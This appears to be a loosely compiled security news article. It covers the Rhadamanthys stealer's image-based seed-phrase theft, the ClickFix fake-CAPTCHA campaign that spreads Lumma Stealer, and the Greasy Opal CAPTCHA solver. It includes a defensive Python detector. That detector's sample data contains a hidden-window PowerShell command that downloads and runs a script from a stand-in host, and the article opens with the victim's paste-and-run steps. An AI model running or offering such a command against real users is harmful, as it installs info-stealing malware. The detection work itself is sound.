- To open the Run dialog box, press Win + R.
- Then paste the clipboard contents into the text field with Ctrl + V.
- Finally, press Enter to execute the pasted command.
A new variant of the Rhadamanthys information stealer has been identified that poses a further threat to cryptocurrency users by adding AI-assisted seed phrase recognition. The operators did not stop at the existing feature set: the malware now includes optical character recognition (OCR), which scans images for seed phrases, the key information needed to access a cryptocurrency wallet.
According to Recorded Future's Insikt Group, Rhadamanthys can now scan infected devices for images containing seed phrases, extract the phrases, and use them for further exploitation.
In practice, this means that wallets whose seed phrases were saved as screenshots or photos rather than as text are now exposed to theft through this malware.
Evolution of Rhadamanthys
First discovered in 2022, Rhadamanthys has become one of the most dangerous information stealers in circulation and operates under the malware-as-a-service (MaaS) model, in which the authors rent the malware to other cyber criminals for a subscription fee of around $250 per month. It lets attackers steal sensitive information, including system details, credentials, browser passwords, and cryptocurrency wallet data.
The malware author, known as "kingcrete," continues to publish new versions through Telegram and Jabber despite being banned from underground forums such as Exploit and XSS, where users from Russia and the former Soviet Union were the main targets.
The latest version, Rhadamanthys 0.7.0, published in June 2024, is a substantial structural overhaul. The malware is now equipped with AI-powered recognition of cryptocurrency wallet seed phrases from images, which makes it a considerably more effective tool in the hands of attackers. The client- and server-side frameworks were fully rewritten for speed and stability. The malware also now ships 30 wallet-cracking algorithms and improved extraction of information from PDFs and saved phrases.
Rhadamanthys also has a plugin system that extends its operations with keylogging, cryptocurrency clipping (swapping wallet addresses in the clipboard), and reverse proxy setups. These tools give operators a flexible, stealthy way to harvest secrets.
Higher Security Risks for Crypto Users
Rhadamanthys is a serious threat to anyone involved with cryptocurrencies, because the attackers target wallet information stored in browsers, PDFs, and images. The use of AI to extract seed phrases from images shows that attackers keep inventing ways around security measures.
This evolution demands better security practices at the individual and organizational level, particularly around cryptocurrencies. Even simple practices, such as never storing sensitive data in an image or other file without proper protection, would have prevented this malware from succeeding.
Broader Implications and Related Threats
Rhadamanthys' continued development is part of a broader trend in malware evolution. Other stealers, such as Lumma and WhiteSnake, have also released updates recently that add further capabilities for extracting sensitive information. For instance, the Lumma stealer bypasses new security features in recent browsers, while the WhiteSnake stealer has been updated to obtain credit card information stored in web browsers.
These persistent updates to stealer malware reflect the growing maturity of cyber threats. Other attacks, such as the ClickFix campaign, deceive users into running malicious code disguised as a CAPTCHA verification.
With cybercrime operators becoming more sophisticated and their tools refined day by day, online security has never faced a greater challenge. Users need to stay alert and informed about emerging threats to protect their personal and financial data.
“We have identified more active malicious sites spreading the Lumma Stealer. It's important to note that while this technique is currently being used to distribute Lumma Stealer, it could potentially be leveraged to deliver any type of malicious malware to unsuspecting users,” say experts from Cloud SEK.
A CAPTCHA traditionally works as a security checkpoint, making sure that online activities are initiated by humans rather than automated bots. Attackers, however, are abusing the familiar CAPTCHA flow by creating a fake CAPTCHA challenge: when a user completes it, the page triggers a series of malicious commands.
The fake CAPTCHA asks users to press a sequence of keys that many assume is harmless. Doing so starts the download and execution of a PowerShell script that installs the Lumma Stealer malware.
Cybersecurity experts from Palo Alto Networks describe Lumma Stealer as information-stealing malware used to steal data such as passwords, cookies, and cryptocurrency wallet credentials. Once present on a compromised device, it exposes users to major risks of financial fraud, further cyberattacks, and identity theft.
The malicious CAPTCHA is distributed at massive scale: experts at Hudson Rock observed that when a user visits a compromised website, the page automatically copies the malicious script to the user's clipboard, which increases the chance that the attack is triggered.
Experts have also noticed an increase in this kind of attack, meaning cybercriminals are refining their tactics. These fake CAPTCHA tests can be spread via phishing emails and messages, which broadens their reach.
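The key sequence described at the top of the article (Win + R, Ctrl + V, Enter) leaves two traces a defender can look for: the pasted command is spawned as a child of explorer.exe, and the Run dialog keeps its history under the RunMRU registry key. The following detection logic is an added example written for this article, not code from any vendor or from the campaign itself; the events, the RunMRU strings, the host name malicious.example, and the indicator weights and threshold are all constructed assumptions, with field names borrowed from the Sysmon Event ID 1 convention.

```python
"""Score process-creation events and Run-dialog history for ClickFix-style
'paste a PowerShell one-liner into Win+R' launches.

All data below is constructed for this example; it is not real telemetry.
"""
import re

# Weighted indicators for a command line pasted into the Run box. Weights and the
# default threshold are this example's own assumptions, not a published rule.
INDICATORS = [
    ("hidden window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("in-memory execution (iex)", 2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("encoded command", 2, re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download primitive", 1, re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I)),
    ("remote URL", 1, re.compile(r"https?://", re.I)),
]
SHELL_IMAGES = ("powershell.exe", "pwsh.exe")
RUN_DIALOG_PARENT = "explorer.exe"  # a command typed into Win+R is spawned by explorer.exe


def score_command(cmd):
    """Return (score, matched indicator names) for one command line."""
    matched = [(name, weight) for name, weight, rx in INDICATORS if rx.search(cmd)]
    return sum(w for _, w in matched), [n for n, _ in matched]


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_clickfix(events, threshold=3):
    """Flag PowerShell children of explorer.exe whose command line scores >= threshold."""
    hits = []
    for ev in events:
        if basename(ev["Image"]) not in SHELL_IMAGES:
            continue
        if basename(ev["ParentImage"]) != RUN_DIALOG_PARENT:
            continue
        score, reasons = score_command(ev["CommandLine"])
        if score >= threshold:
            hits.append({"ProcessId": ev["ProcessId"], "score": score, "reasons": reasons})
    return hits


def scan_runmru(values, threshold=3):
    """Score Run-dialog history strings (HKCU\\...\\Explorer\\RunMRU values).

    Each stored value carries the dialog's own trailing '\\1' suffix, which is stripped.
    """
    flagged = []
    for raw in values:
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        score, reasons = score_command(cmd)
        if score >= threshold:
            flagged.append((cmd, score, reasons))
    return flagged


# Constructed process-creation events in Sysmon Event ID 1 style.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {  # benign: user opened an interactive PowerShell window
        "ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": '"' + PS + '"',
    },
    {  # ClickFix-like: hidden window plus an in-memory download cradle, launched via Win+R
        "ProcessId": 5204, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -w hidden -c "iex (irm https://malicious.example/verify)"',
    },
    {  # benign: scheduled script, parent is not explorer.exe so it is never scored
        "ProcessId": 6010, "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    },
    {  # benign-looking download from explorer: scores 2 (URL + download), below threshold
        "ProcessId": 7330, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://intranet.example/report.csv -OutFile report.csv"',
    },
]

# Constructed RunMRU values; only the last one is a pasted payload.
SAMPLE_RUNMRU = [
    "notepad\\1",
    "cmd\\1",
    'powershell -w hidden -c "iex (irm https://malicious.example/verify)"\\1',
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print("process", hit["ProcessId"], "score", hit["score"], hit["reasons"])
    for cmd, score, reasons in scan_runmru(SAMPLE_RUNMRU):
        print("RunMRU", repr(cmd), "score", score, reasons)
```

The weighted scoring is what keeps an ordinary download from the Run box (score 2 in the sample) from paging an analyst while the hidden-window cradle (score 6) does; in a real deployment the RunMRU values would be read from the user's hive and the events from the Sysmon channel, with the weights tuned to the environment's baseline.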
- Check URLs: make sure the site is authentic before interacting with any CAPTCHA.
- Keep systems updated: an up-to-date OS, browser, and antivirus software improve your security.
- Stay cautious with CAPTCHAs: be wary of any CAPTCHA that requests an action beyond selecting images or entering text.
- Follow safe browsing hygiene: do not click links or open attachments from unknown messages or emails.
CAPTCHAs, or Completely Automated Public Turing tests to tell Computers and Humans Apart, were introduced as a security measure to prevent automated bots from accessing websites and online services. However, as with any security measure, some sought to circumvent it. Enter Greasy Opal, a developer who saw an opportunity in the burgeoning field of CAPTCHA-solving technology.
Greasy Opal’s tool, which started as a simple script, quickly evolved into a sophisticated piece of software capable of solving CAPTCHAs with high accuracy. The tool’s effectiveness made it a favorite among cybercriminals, who used it to automate various illicit activities, from spamming and social media promotion to black hat SEO and account takeovers.
At its core, a CAPTCHA solver mimics human behavior to bypass the security checks designed to differentiate between humans and bots. Greasy Opal’s solver employs advanced machine learning algorithms and image recognition techniques to decode the distorted text and images commonly used in CAPTCHAs. The tool’s ability to solve CAPTCHAs at scale has made it an invaluable asset for cybercriminals looking to automate their operations.
The solver is available in free and paid versions, with the paid tier offering higher accuracy and faster recognition times. This tiered approach has allowed Greasy Opal to monetize the tool while maintaining a veneer of legitimacy by paying taxes and operating as a seemingly lawful business.
The widespread use of Greasy Opal’s CAPTCHA solver has had a profound impact on the cybercriminal landscape. By automating the process of solving CAPTCHAs, the tool has lowered the barrier to entry for less-skilled threat actors, enabling them to carry out large-scale attacks with minimal effort. This democratization of cybercrime has led to an increase in the volume and sophistication of attacks targeting various sectors, including e-commerce, social media, and government services.
Prominent entities such as Amazon, Apple, and Facebook have been targeted using Greasy Opal’s tool, highlighting the far-reaching implications of this technology. Researchers at Arkose Labs have acknowledged the tool’s efficiency, noting its role in facilitating a wide range of cybercriminal activities.
Despite its clear association with illegal activities, Greasy Opal continues to operate under a legitimate guise. The developer’s decision to pay taxes and comply with certain legal requirements has allowed them to avoid significant legal repercussions. However, this raises important ethical questions about the responsibility of developers in the cybersecurity space.
The case of Greasy Opal underscores the need for stricter regulations and enforcement mechanisms to curb the misuse of technology for criminal purposes. It also highlights the importance of ongoing research and innovation in developing more robust security measures to counteract such threats.
As cybersecurity measures continue to evolve, so too will the techniques used to bypass them. Greasy Opal’s CAPTCHA solver is a testament to the enduring cat-and-mouse game between security professionals and cybercriminals. While CAPTCHAs remain a widely used security measure, their effectiveness is increasingly being called into question as tools like Greasy Opal’s become more advanced.